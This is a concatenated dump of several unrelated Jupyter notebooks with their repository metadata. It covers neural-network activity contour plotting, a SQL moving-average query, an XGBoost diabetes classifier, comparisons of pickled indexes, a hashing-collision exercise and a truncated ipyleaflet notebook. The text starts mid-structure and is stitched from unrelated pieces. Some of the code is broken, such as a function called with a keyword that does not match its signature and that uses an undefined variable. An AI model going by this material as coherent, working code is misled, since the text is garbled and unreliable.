"num_rand_orthogonal = np.prod(analyzer.model.get_input_shape()[1:])\nnum_imgs = int(228**2)\nset_norm_activity(\n analyzer=analyzer_list[0],\n target_neuron_idx=0,#np.random.choice(range(analyzer.model.get_num_latent()), 1),\n num_rand_orthogonal=num_rand_orthogonal,\n orthogonal_idx=np.random.choice(range(1, num_rand_orthogonal), 1),\n num_imgs=num_imgs)",
"_____no_output_____"
],
[
"for analyzer in analyzer_list:\n num_plots_y = 1\n num_plots_x = 2\n gs1 = gridspec.GridSpec(num_plots_y, num_plots_x, wspace=0.3, width_ratios=[4, 1])\n fig = plt.figure(figsize=(6,6))\n curve_ax = pf.clear_axis(fig.add_subplot(gs1[0]))\n #cmap = plt.get_cmap('tab20b')\n cmap = plt.get_cmap('viridis')\n vmin = np.floor(np.min(analyzer.norm_activity))#0.0\n vmax = np.ceil(np.max(analyzer.norm_activity))#1.0\n \n #name_suffix = \"continuous\"\n #pts = curve_ax.scatter(analyzer.proj_datapoints[:,0], analyzer.proj_datapoints[:,1],\n # vmin=vmin, vmax=vmax, cmap=cmap, alpha=0.5, c=analyzer.norm_activity[:, analyzer.bf_id0], s=5.0)\n \n norm_activity = analyzer.norm_activity[:, analyzer.bf_id0]\n norm_activity = norm_activity.reshape(int(np.sqrt(num_imgs)), int(np.sqrt(num_imgs)))\n \n levels = 5\n name_suffix = \"\"\n contsf = curve_ax.contourf(analyzer.X_mesh, analyzer.Y_mesh, norm_activity,\n levels=levels, vmin=vmin, vmax=vmax, alpha=1.0, antialiased=True, cmap=cmap)\n \n curve_ax.arrow(0, 0, analyzer.proj_neuron0[0].item(), analyzer.proj_neuron0[1].item(),\n width=0.05, head_width=0.15, head_length=0.15, fc='r', ec='r')\n curve_ax.arrow(0, 0, analyzer.proj_neuron1[0].item(), analyzer.proj_neuron1[1].item(),\n width=0.05, head_width=0.15, head_length=0.15, fc='w', ec='k')\n \n curve_ax.set_ylim([-2, 2.0])\n curve_ax.set_xlim([-2, 2.0])\n curve_ax.set_aspect(\"equal\")\n curve_ax.set_title(\"Neuron ID \"+str(analyzer.bf_id0), fontsize=16)\n \n gs2 = gridspec.GridSpecFromSubplotSpec(2, 1, gs1[1], hspace=-0.5)\n bf1_ax = pf.clear_axis(fig.add_subplot(gs2[0]))\n bf1_ax.imshow(analyzer.neuron_vis_output[\"optimal_stims\"][analyzer.bf_id0][step_idx].reshape((28,28)),\n cmap=\"Greys_r\")\n bf1_ax.set_title(\"Primary\\n Stimulus\", color='r', fontsize=16)\n \n activity_ax = fig.add_subplot(gs2[1])\n activity_ax.plot(norm_activity[0,:], color='k')\n activity_ax.set_aspect(1.0/activity_ax.get_data_ratio())\n activity_ax.set_title(\"Activity along\\nstimulus vector\")\n \n fig.savefig(analyzer.analysis_out_dir+\"/vis/neuron_response_contours_bf0id\"+str(analyzer.bf_id0)+name_suffix+\".png\",\n transparent=True, bbox_inches=\"tight\", pad_inches=0.01)\n plt.show()",
"_____no_output_____"
],
[
"def set_norm_activity(analyzer, target_neuron_idx, num_orth_directions,\n orthogonal_idx, num_imgs, orth_neuron_indices=None):\n\n # Get alt vectors\n #for orth_idx in range(num_orth_directions):\n # if alt_neuron_indices is None: # find random orthogonal indices\n # tmp_bf1 = find_orth_vect(alt_vectors)\n # else: # use other pre-images as starting point for orthogonal indices\n # tmp_bf1 = analyzer.neuron_vis_output[\"optimal_stims\"][alt_neuron_indices[pop_idx]][step_idx]\n # tmp_bf1 /= np.linalg.norm(tmp_bf1)\n # alt_vectors = np.append(alt_vectors, tmp_bf1[:,None], axis=1)\n\n # Construct point dataset\n x_pts = np.linspace(-0.5, 5.0, int(np.sqrt(num_imgs)))\n y_pts = np.linspace(-2.0, 2.0, int(np.sqrt(num_imgs)))\n analyzer.X_mesh, analyzer.Y_mesh = np.meshgrid(x_pts, y_pts)\n analyzer.proj_datapoints = np.stack([analyzer.X_mesh.reshape(num_imgs),\n analyzer.Y_mesh.reshape(num_imgs)], axis=1)\n \n # Compute projection matrix to inject the point dataset into image space\n proj_matrix, v = analyzer.bf_projections(analyzer.bf0, np.squeeze(alt_vectors[:, orthogonal_idx]))\n analyzer.proj_neuron0 = np.dot(proj_matrix, analyzer.bf0).T\n analyzer.proj_neuron1 = np.dot(proj_matrix, np.squeeze(alt_vectors[:, orthogonal_idx])).T\n \n orth_datapoints = None#np.stack([np.dot(proj_matrix.T, v)])\n #for orth_id in range(num_orth_directions)], axis=0)\n \n datapoints = np.stack([np.dot(proj_matrix.T, analyzer.proj_datapoints[data_id,:])\n for data_id in range(num_imgs)]) #inject\n datapoints, orig_shape = dp.reshape_data(datapoints, flatten=False)[:2]\n datapoints = {\"test\": Dataset(datapoints, lbls=None,\n ignore_lbls=None, rand_state=analyzer.rand_state)}\n #params={\"whiten_data\":analyzer.model_params.whiten_data}\n #if params[\"whiten_data\"]:\n # params[\"whiten_method\"] = analyzer.model_params.whiten_method\n #datapoints = analyzer.model.preprocess_dataset(datapoints, params=params)\n datapoints = analyzer.model.reshape_dataset(datapoints, analyzer.model_params)\n datapoints[\"test\"].images = (\n (datapoints[\"test\"].images - np.min(datapoints[\"test\"].images, axis=1, keepdims=True))\n / (np.max(datapoints[\"test\"].images, axis=1, keepdims=True) - np.min(datapoints[\"test\"].images, axis=1, keepdims=True)))\n #datapoints[\"test\"].images /= np.max(np.abs(datapoints[\"test\"].images))\n #datapoints[\"test\"].images *= analyzer.analysis_params.input_scale*3\n \n activations = analyzer.compute_activations(datapoints[\"test\"].images)#, batch_size=num_imgs//16)\n activity_max = np.amax(np.abs(activations))\n analyzer.norm_activity = activations / (activity_max + 0.00001) # Rescale between -1 and 1\n \n return orth_datapoints",
"_____no_output_____"
],
[
"def get_norm_activity(analyzer, bf0, alt_vectors, num_imgs):\n # Construct point dataset\n x_pts = np.linspace(-0.5, 5.0, int(np.sqrt(num_imgs)))\n y_pts = np.linspace(-2.0, 2.0, int(np.sqrt(num_imgs)))\n X_mesh, Y_mesh = np.meshgrid(x_pts, y_pts)\n proj_datapoints = np.stack([X_mesh.reshape(num_imgs), Y_mesh.reshape(num_imgs)], axis=1)\n \n out_dict = {\n \"norm_activity\": [],\n \"proj_neuron0\": [],\n \"proj_neuron1\": [],\n \"proj_v\": [],\n \"proj_datapoints\": proj_datapoints,\n \"X_mesh\": X_mesh,\n \"Y_mesh\": Y_mesh}\n\n for alt_vector_idx in range(alt_vectors.shape[1]):\n alt_vector = alt_vectors[:, alt_vector_idx]\n proj_matrix, v = dp.bf_projections(bf0, alt_vector)\n out_dict[\"proj_neuron0\"].append(np.dot(proj_matrix, bf0).T) #project\n out_dict[\"proj_neuron1\"].append(np.dot(proj_matrix, alt_vector).T) #project\n out_dict[\"proj_v\"].append(np.dot(proj_matrix, v).T) #project\n \n datapoints = np.stack([np.dot(proj_matrix.T, proj_datapoints[data_id,:])\n for data_id in range(num_imgs)]) #inject\n datapoints = dp.reshape_data(datapoints, flatten=False)[0]\n datapoints = {\"test\": Dataset(datapoints, lbls=None, ignore_lbls=None,\n rand_state=analyzer.rand_state)}\n \n # preprocess_dataset should include rescaling to be between (0,1) for mnist\n params={\"whiten_data\":analyzer.model_params.whiten_data}\n if params[\"whiten_data\"]:\n params[\"whiten_method\"] = analyzer.model_params.whiten_method\n datapoints = analyzer.model.preprocess_dataset(datapoints, params=params)\n datapoints = analyzer.model.reshape_dataset(datapoints, analyzer.model_params)\n datapoints[\"test\"].images = (\n (datapoints[\"test\"].images - np.min(datapoints[\"test\"].images, axis=1, keepdims=True))\n / (np.max(datapoints[\"test\"].images, axis=1, keepdims=True) - np.min(datapoints[\"test\"].images, axis=1, keepdims=True)))\n #datapoints[\"test\"].images /= np.max(np.abs(datapoints[\"test\"].images))\n #datapoints[\"test\"].images *= analyzer.analysis_params.input_scale*3\n \n activations = analyzer.compute_activations(datapoints[\"test\"].images)#, batch_size=num_imgs//16)\n activity_max = np.amax(np.abs(activations))\n out_dict[\"norm_activity\"].append(activations / (activity_max + 0.00001)) # Rescale between -1 and 1\n \n return out_dict",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"raw",
"code",
"markdown",
"code",
"raw"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"raw"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"raw",
"raw",
"raw",
"raw",
"raw"
]
] |
cb28fd4b4aa7c7dcf414b66a9679119b0c8e659a | 7,773 | ipynb | Jupyter Notebook | 15_moving_averages.ipynb | mnrclab/Advanced_SQL_TimeSeries | 395c97f01bf003e5c661c36e1b81589b2341fb17 | [
"Unlicense"
] | null | null | null | 15_moving_averages.ipynb | mnrclab/Advanced_SQL_TimeSeries | 395c97f01bf003e5c661c36e1b81589b2341fb17 | [
"Unlicense"
] | null | null | null | 15_moving_averages.ipynb | mnrclab/Advanced_SQL_TimeSeries | 395c97f01bf003e5c661c36e1b81589b2341fb17 | [
"Unlicense"
] | null | null | null | 33.649351 | 108 | 0.33655 | [
[
[
"sql(\n '''\n SELECT\n Order_Date,\n Product_ID, \n Sub_Category,\n Quantity,\n ROUND(Profit, 2) AS Profit,\n ROUND(SUM(Profit) OVER(ORDER BY Order_Date ROWS BETWEEN UNBOUNDED PRECEDING AND\n CURRENT ROW), 2) AS Cummulative_SUM_Profit,\n ROUND(AVG(Profit) OVER(ORDER BY Order_Date ROWS BETWEEN UNBOUNDED PRECEDING AND\n CURRENT ROW), 2) AS Cummulative_AVG_Profit\n FROM superstore;\n '''\n)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code"
]
] |
cb292121b25ac33c7811e623e53872a36c5f15bf | 73,384 | ipynb | Jupyter Notebook | Projects in Python with Scikit-Learn- XGBoost- Pandas- Statsmodels- etc./Diabetes Diagnosis (XGBoost).ipynb | RooHashemi/Data-Science-Projects-with-Python-Spark-Keras_TensorFlow-AWS | 18b689decaed259a26ef7b9a8f894752acb567a9 | [
"MIT"
] | 2 | 2019-01-02T02:50:29.000Z | 2020-06-16T12:32:37.000Z | Projects in Python with Scikit-Learn- XGBoost- Pandas- Statsmodels- etc./Diabetes Diagnosis (XGBoost).ipynb | RooHashemi/Data-Science-Projects-with-Python-Spark-Keras_TensorFlow-AWS | 18b689decaed259a26ef7b9a8f894752acb567a9 | [
"MIT"
] | null | null | null | Projects in Python with Scikit-Learn- XGBoost- Pandas- Statsmodels- etc./Diabetes Diagnosis (XGBoost).ipynb | RooHashemi/Data-Science-Projects-with-Python-Spark-Keras_TensorFlow-AWS | 18b689decaed259a26ef7b9a8f894752acb567a9 | [
"MIT"
] | null | null | null | 101.21931 | 18,892 | 0.807111 | [
[
[
"# Data description & Problem statement: \nThis dataset is originally from the National Institute of Diabetes and Digestive and Kidney Diseases. The objective of the dataset is to diagnostically predict whether or not a patient has diabetes, based on certain diagnostic measurements included in the dataset. Several constraints were placed on the selection of these instances from a larger database. In particular, all patients here are females at least 21 years old of Pima Indian heritage.\n\nThe type of dataset and problem is a classic supervised binary classification. Given a number of elements all with certain characteristics (features), we want to build a machine learning model to identify people affected by type 2 diabetes.\n\n\n# Workflow:\n- Load the dataset, and define the required functions (e.g. for detecting the outliers)\n- Data Cleaning/Wrangling: Manipulate outliers, missing data or duplicate values, Encode categorical variables, etc.\n- Split data into training & test parts (utilize the training part for training & hyperparameter tuning of model, and test part for the final evaluation of model)\n # Model Training:\n- Build an initial XGBoost model, and evaluate it via C-V approach\n- Use grid-search along with C-V approach to find the best hyperparameters of XGBoost model: Find the best XGBoost model (Note: I've utilized SMOTE technique via imblearn toolbox to synthetically over-sample the minority category and even the dataset imbalances.)\n # Model Evaluation: \n- Evaluate the best XGBoost model with optimized hyperparameters on Test Dataset, by calculating:\n - AUC score\n - Confusion matrix\n - ROC curve \n - Precision-Recall curve \n - Average precision\n \nFinally, calculate the Feature Importance. ",
"_____no_output_____"
]
],
[
[
"import sklearn\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import preprocessing\n%matplotlib inline\n\nfrom scipy import stats\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")",
"_____no_output_____"
],
[
"# Function to remove outliers (all rows) by Z-score: \ndef remove_outliers(X, y, name, thresh=3):\n L=[]\n for name in name:\n drop_rows = X.index[(np.abs(X[name] - X[name].mean()) >= (thresh * X[name].std()))]\n L.extend(list(drop_rows))\n \n X.drop(np.array(list(set(L))), axis=0, inplace=True)\n y.drop(np.array(list(set(L))), axis=0, inplace=True)\n print('number of outliers removed : ' , len(L))",
"_____no_output_____"
],
[
"df=pd.read_csv('C:/Users/rhash/Documents/Datasets/pima-indian-diabetes/indians-diabetes.csv') \n\ndf.columns=['NP', 'GC', 'BP', 'ST', 'I', 'BMI', 'PF', 'Age', 'Class']\n\n# To Shuffle the data:\nnp.random.seed(42)\ndf=df.reindex(np.random.permutation(df.index))\ndf.reset_index(inplace=True, drop=True)\n\ndf.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 768 entries, 0 to 767\nData columns (total 9 columns):\nNP 768 non-null int64\nGC 768 non-null int64\nBP 768 non-null int64\nST 768 non-null int64\nI 768 non-null int64\nBMI 768 non-null float64\nPF 768 non-null float64\nAge 768 non-null int64\nClass 768 non-null int64\ndtypes: float64(2), int64(7)\nmemory usage: 54.1 KB\n"
],
[
"df['ST'].replace(0, df[df['ST']!=0]['ST'].mean(), inplace=True)\ndf['GC'].replace(0, df[df['GC']!=0]['GC'].mean(), inplace=True)\ndf['BP'].replace(0, df[df['BP']!=0]['BP'].mean(), inplace=True)\ndf['BMI'].replace(0, df[df['BMI']!=0]['BMI'].mean(), inplace=True)\ndf['I'].replace(0, df[df['I']!=0]['I'].mean(), inplace=True)",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"X=df.drop('Class', axis=1)\ny=df['Class']\n\n# We initially devide data into training & test folds: We do the Grid-Search only on training part \nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42, stratify=y)\n\n#remove_outliers(X_train, y_train, ['NP', 'GC', 'BP', 'ST', 'I', 'BMI', 'PF', 'Age'], thresh=5)",
"_____no_output_____"
],
[
"# Building the Initial Model & Cross-Validation: \nimport xgboost\nfrom xgboost import XGBClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import StratifiedKFold\n\nmodel=XGBClassifier() \nkfold=StratifiedKFold(n_splits=4, shuffle=True, random_state=42)\nscores=cross_val_score(model, X_train, y_train, cv=kfold)\n\nprint(scores, \"\\n\")\nprint(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std()))",
"[0.75172414 0.77083333 0.76388889 0.79020979] \n\nAccuracy: 0.77 (+/- 0.01)\n"
],
[
"# Grid-Search for the best model parameters: \n\n# We create a sample_weight list for this imbalanced dataset:\nfrom sklearn.utils.class_weight import compute_sample_weight\nsw=compute_sample_weight(class_weight='balanced', y=y_train)\n\n\nfrom sklearn.model_selection import GridSearchCV\nparam={'max_depth':[2, 4, 6, 8], 'min_child_weight':[1, 2, 3], 'gamma': [ 0, 0.05, 0.1], 'subsample':[0.7, 1]}\n\nkfold=StratifiedKFold(n_splits=3, shuffle=True, random_state=42)\ngrid_search=GridSearchCV(XGBClassifier(), param, cv=kfold, n_jobs=-1, scoring=\"roc_auc\")\ngrid_search.fit(X_train, y_train, sample_weight=sw)\n\n# Grid-Search report: \nG=pd.DataFrame(grid_search.cv_results_).sort_values(\"rank_test_score\")\nG.head(3)",
"_____no_output_____"
],
[
"print(\"Best parameters: \", grid_search.best_params_)\nprint(\"Best validation accuracy: %0.2f (+/- %0.2f)\" % (np.round(grid_search.best_score_, decimals=2), np.round(G.loc[grid_search.best_index_,\"std_test_score\" ], decimals=2)))\nprint(\"Test score: \", np.round(grid_search.score(X_test, y_test),2))",
"Best parameters: {'gamma': 0, 'max_depth': 2, 'min_child_weight': 1, 'subsample': 1}\nBest validation accuracy: 0.82 (+/- 0.02)\nTest score: 0.82\n"
],
[
"from sklearn.metrics import roc_curve, auc, confusion_matrix, classification_report\n\n# Plot a confusion matrix.\n# cm is the confusion matrix, names are the names of the classes.\ndef plot_confusion_matrix(cm, names, title='Confusion matrix', cmap=plt.cm.Blues):\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(names))\n plt.xticks(tick_marks, names, rotation=45)\n plt.yticks(tick_marks, names)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\nnames = [\"0\", \"1\"]\n\n# Compute confusion matrix\ncm = confusion_matrix(y_test, grid_search.predict(X_test))\nnp.set_printoptions(precision=2)\nprint('Confusion matrix, without normalization')\nprint(cm)\n\n# Normalize the confusion matrix by row (i.e by the number of samples in each class)\ncm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\nprint('Normalized confusion matrix')\nprint(cm_normalized)\nplt.figure()\nplot_confusion_matrix(cm_normalized, names, title='Normalized confusion matrix')\n\nplt.show()",
"Confusion matrix, without normalization\n[[92 33]\n [22 45]]\nNormalized confusion matrix\n[[0.74 0.26]\n [0.33 0.67]]\n"
],
[
"# Classification report:\nreport=classification_report(y_test, grid_search.predict(X_test))\nprint(report)",
" precision recall f1-score support\n\n 0 0.81 0.74 0.77 125\n 1 0.58 0.67 0.62 67\n\navg / total 0.73 0.71 0.72 192\n\n"
],
[
"# ROC curve & auc:\nfrom sklearn.metrics import precision_recall_curve, roc_curve, roc_auc_score, average_precision_score\n\nfpr, tpr, thresholds=roc_curve(np.array(y_test),grid_search.predict_proba(X_test)[:, 1] , pos_label=1)\nroc_auc=roc_auc_score(np.array(y_test), grid_search.predict_proba(X_test)[:, 1])\n\nplt.figure()\n\nplt.step(fpr, tpr, color='darkorange', lw=2, label='ROC curve (auc = %0.2f)' % roc_auc)\nplt.plot([0, 1], [0, 1], color='navy', alpha=0.4, lw=2, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC curve')\nplt.legend(loc=\"lower right\")\n\nplt.plot([cm_normalized[0,1]], [cm_normalized[1,1]], 'or')\nplt.show()",
"_____no_output_____"
],
[
"# Precision-Recall trade-off:\nprecision, recall, thresholds=precision_recall_curve(y_test,grid_search.predict_proba(X_test)[:, 1], pos_label=1)\nave_precision=average_precision_score(y_test,grid_search.predict_proba(X_test)[:, 1])\n\nplt.step(recall, precision, color='navy')\n\nplt.xlabel('Recall')\nplt.ylabel('Precision')\nplt.xlim([0, 1.001])\nplt.ylim([0, 1.02])\nplt.title('Precision-Recall curve: AP={0:0.2f}'.format(ave_precision))\n\nplt.plot([cm_normalized[1,1]], [cm[1,1]/(cm[1,1]+cm[0,1])], 'ob')\nplt.show()",
"_____no_output_____"
],
[
"# Feature Importance:\nim=XGBClassifier().fit(X,y).feature_importances_\n\n# Sort & Plot:\nd=dict(zip(np.array(X.columns), im))\nk=sorted(d,key=lambda i: d[i], reverse= True)\n[print((i,d[i])) for i in k]\n\n# Plot:\nc1=pd.DataFrame(np.array(im), columns=[\"Importance\"])\nc2=pd.DataFrame(np.array(X.columns[0:8]),columns=[\"Feature\"])\n\nfig, ax = plt.subplots(figsize=(8,6)) \nsns.barplot(x=\"Feature\", y=\"Importance\", data=pd.concat([c2,c1], axis=1), color=\"blue\", ax=ax)",
"('PF', 0.18965517)\n('GC', 0.18275861)\n('BMI', 0.1724138)\n('I', 0.13103448)\n('Age', 0.112068966)\n('NP', 0.0862069)\n('ST', 0.077586204)\n('BP', 0.048275862)\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2921df64543f64348ea7501c33c9f846c34d43 | 7,292 | ipynb | Jupyter Notebook | Untitled.ipynb | rajharshiitb/FEVEROUS | 817750a6d9993c95253a33c7289d1ce3e85f145c | [
"Apache-2.0"
] | null | null | null | Untitled.ipynb | rajharshiitb/FEVEROUS | 817750a6d9993c95253a33c7289d1ce3e85f145c | [
"Apache-2.0"
] | null | null | null | Untitled.ipynb | rajharshiitb/FEVEROUS | 817750a6d9993c95253a33c7289d1ce3e85f145c | [
"Apache-2.0"
] | 1 | 2021-12-21T04:44:47.000Z | 2021-12-21T04:44:47.000Z | 19.602151 | 313 | 0.485464 | [
[
[
"import numpy as np",
"_____no_output_____"
],
[
"index1 = np.load(\"/mnt/infonas/data/harshiitb/MTP/MTP/data/idxv1.pkl\",allow_pickle=True)\nindex2 = np.load(\"/mnt/infonas/data/harshiitb/MTP/MTP/data/idxv2.pkl\",allow_pickle=True)\nindex3 = np.load(\"/mnt/infonas/data/harshiitb/MTP/MTP/data/worker1_0.pkl\",allow_pickle=True)\nindex4 = np.load(\"/mnt/infonas/data/harshiitb/MTP/MTP/data/worker1_1.pkl\",allow_pickle=True)",
"_____no_output_____"
],
[
"index1 = index1\nindex2 = index2",
"_____no_output_____"
],
[
"common = list(set(index1.keys()).intersection(set(index2.keys())))",
"_____no_output_____"
],
[
"len(index3)",
"_____no_output_____"
],
[
"len(index4)",
"_____no_output_____"
],
[
"len(set(index2.keys()).intersection(set(index3.keys())))",
"_____no_output_____"
],
[
"len(common)",
"_____no_output_____"
],
[
"print(len(index1),len(index2))",
"16658 16659\n"
],
[
"count = 0\nv1 = 0\nv2 = 0\nfor ent in common:\n list1 = set(index1[ent])\n list2 = set(index2[ent])\n v1 += len(list1)\n v2 += len(list2)\n inter = list1.intersection(list2)\n count += abs(len(inter)-max(len(list1),len(list2)))\nprint(count)",
"17\n"
],
[
"count = 0\nv2 = 0\nv3 = 0\nfor ent in common:\n list3 = set(index3[ent])\n list2 = set(index2[ent])\n v3 += len(list3)\n v2 += len(list2)\n inter = list3.intersection(list2)\n count += abs(len(inter)-max(len(list3),len(list2)))\nprint(count)",
"0\n"
],
[
"print(v3,v2)",
"68294 68294\n"
],
[
"index1['Human Rights Campaign']",
"_____no_output_____"
],
[
"index2['Foundation (evidence)']",
"_____no_output_____"
],
[
"index.keys()",
"_____no_output_____"
],
[
"index['Dot-com company']",
"_____no_output_____"
],
[
"index_fast = np.load(\"/mnt/infonas/data/harshiitb/MTP/MTP/data/idx_fast.pkl\",allow_pickle=True)",
"_____no_output_____"
],
[
"index_fast.keys()",
"_____no_output_____"
],
[
"index_fast['Pepco Holdings']",
"_____no_output_____"
],
[
"len(index_fast)",
"_____no_output_____"
],
[
"len(index)",
"_____no_output_____"
],
[
"index4['Dot-com company']",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2937ea3487eef252e8dcaae63858237600049b | 26,425 | ipynb | Jupyter Notebook | Hashing_and_Collisions_notebook.ipynb | ARU-Bioinf-CMA-2020/tw1_hashing_collisions | bcccbf0bde545c4ef1ab3a5a4d955efaa2a7c95c | [
"Apache-2.0"
] | null | null | null | Hashing_and_Collisions_notebook.ipynb | ARU-Bioinf-CMA-2020/tw1_hashing_collisions | bcccbf0bde545c4ef1ab3a5a4d955efaa2a7c95c | [
"Apache-2.0"
] | null | null | null | Hashing_and_Collisions_notebook.ipynb | ARU-Bioinf-CMA-2020/tw1_hashing_collisions | bcccbf0bde545c4ef1ab3a5a4d955efaa2a7c95c | [
"Apache-2.0"
] | null | null | null | 91.753472 | 18,108 | 0.848817 | [
[
[
"# Simple Hashing and Collisions",
"_____no_output_____"
],
[
"This is a very simple example of hashing based on the modulo function and neglecting the issue of collisions mentioned in the lecture.",
"_____no_output_____"
],
[
"## Introduction",
"_____no_output_____"
],
[
"Good hashing approaches are available in Python for the *Dictionary* data type. However here is a demonstration of a simple hashing function. The data values have actually been chosen to avoid collisions for the initial size for the hash table. \nIn this example the data values are their own keys.",
"_____no_output_____"
],
[
"## A simple hash function",
"_____no_output_____"
]
],
[
[
"data = [8, 17, 27, 30, 55, 56, 57, 60, 1001, 1002]",
"_____no_output_____"
]
],
[
[
"Some of the values are closely spaced in value. The aim is spread them through the hash table in an apparently random way. \nThe hash table is initially loaded with placeholder 'None' values.\nThe chosen size is 17 for the demo.",
"_____no_output_____"
]
],
[
[
"hash_table = [None] * 17\ntableLength = len(hash_table)",
"_____no_output_____"
]
],
[
[
"The hash function is the modulo (remainder) of the data value devided by the length of the hash_table.",
"_____no_output_____"
]
],
[
[
"def hash_function(value, table_size):\n return value % table_size",
"_____no_output_____"
]
],
[
[
"The data values can now be distributed in the hash_table using the hash_function. ",
"_____no_output_____"
]
],
[
[
"for value in data:\n hash_table[hash_function(value, tableLength)] = value",
"_____no_output_____"
]
],
[
[
"Here they are, notice the function has distributed them through the table.",
"_____no_output_____"
]
],
[
[
"print(hash_table)",
"[17, None, None, None, 55, 56, 57, None, 8, 60, 27, None, None, 30, None, 1001, 1002]\n"
]
],
[
[
"A value can be retrieved from the table by applying the hash function - but in this case they are their own keys so it does not appear very useful.",
"_____no_output_____"
]
],
[
[
"print(hash_table[hash_function(27, tableLength)])",
"27\n"
]
],
[
[
"There is not much space for addtional values in this case without collisions. These occur when the hash_function for a new key is the same as an existing one.\n,\nOne way to minimize collisions is to make a better choice for the hashing function. For example it might be better to use a large prime number for the modulo function function in preference to the tableLength value *e.g.* for a 1000-slot table use the prime 997. \n\nA completely functional hash_table would have one of the methods for dealing with a collision. The overhead in dealing with collisions will decrease the hashing performance from its initial O(1). For retrieving data the process is slowed up by the added steps when a slot has been assigned to multiple data values. \n\nThe overhead increases as the *'load factor'* for the hash table increases. The *load factor* (often called $\\alpha$) is the proportion of the slots that have values loaded into them. \n\nSo for the demo with initial valuesabove there are 9 data values in 15 slots: so that is a load value of 9/15 or 0.60.\n\nFor the simple linear addressing method of dealing with collisions the big O performance of the hashing varies as:\n\n$O$ = 1+(1/(1-$\\alpha$)<sup>2</sup>)\n\n(ref. Sedgewick, R. (2003) Linear probing. p615, *Algorthims in Java*, Addison Wesley) \n\nFor low $\\alpha$, such as occurs with small numbers of data elements in a large hashing table the O(1) performance will be not degraded by the 1-$\\alpha$)<sup>2</sup>) term in this expression.\n\n**To see the form of this expression with increasing $\\alpha$ your job is to plot the function as the load factor approaches 1. You should do this with matlibplot. The next section shows you how to plot a function.**\n",
"_____no_output_____"
],
[
"## Plotting a function with matlibplot\n\nThis is simple example showing how we can plot the function $y$ = $x$<sup>2</sup> for $x$ in the range 0 to 4:",
"_____no_output_____"
]
],
[
[
"# This line configures matplotlib to show figures embedded in the notebook\n# It uses the IPython inline 'magic' syntax\n%matplotlib inline\n# standard import\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np",
"_____no_output_____"
],
[
"x = np.linspace(start=-4., stop=4.) # Return evenly spaced numbers over a specified interval.\ny = x**2\nplt.figure()\nplt.plot(x,y)\nplt.title('a quadratic function')\nplt.xlabel('x axis label')\nplt.ylabel('y axis label')\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Your task\nPlot how the $O$ the big O performance of the hashing with the load factor $\\alpha$ according to the Sedgewick formulae above.\n\nConsider what is a good range to use for $\\alpha$ in the plot and make sure you label both the plot and the axes.\n\nPlease note that you will need to have produced the plot to answer question 12 of the \n<a href='https://canvas.anglia.ac.uk/courses/15139/assignments/88350'>TW1 quiz</a>",
"_____no_output_____"
]
],
[
[
"# your code for the plot",
"_____no_output_____"
]
],
[
[
"You should notice that the plot shows that linear addressing has a strikingly non-linear loss of performance as the hash table load factor increases. \n\nHowever, a small load factor is also an inefficient use of memory space. So as a result, many more sophisticated methods of dealing with collision have been devised which have better performance at higher load factors.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2940a0e0b24da4f99902c84799372dd73b157c | 1,979 | ipynb | Jupyter Notebook | 5-European_GeoJSON.ipynb | VasavanThiru/ipy-pandas-leaflet | b307669b03ba8a07535cd0ad1eb65a0a504c78fb | [
"MIT"
] | null | null | null | 5-European_GeoJSON.ipynb | VasavanThiru/ipy-pandas-leaflet | b307669b03ba8a07535cd0ad1eb65a0a504c78fb | [
"MIT"
] | null | null | null | 5-European_GeoJSON.ipynb | VasavanThiru/ipy-pandas-leaflet | b307669b03ba8a07535cd0ad1eb65a0a504c78fb | [
"MIT"
] | null | null | null | 24.432099 | 129 | 0.528044 | [
[
[
"from ipyleaflet import Map, GeoJSON \nimport json \nimport os \nimport requests ",
"_____no_output_____"
],
[
